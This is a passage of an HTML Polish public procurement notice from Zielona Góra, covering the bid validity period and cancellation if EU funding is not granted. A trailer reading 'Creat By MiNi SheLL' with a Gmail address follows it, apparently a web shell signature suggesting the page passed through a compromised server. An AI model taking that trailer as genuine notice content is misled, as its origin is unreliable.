65-046 Zielona Góra.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com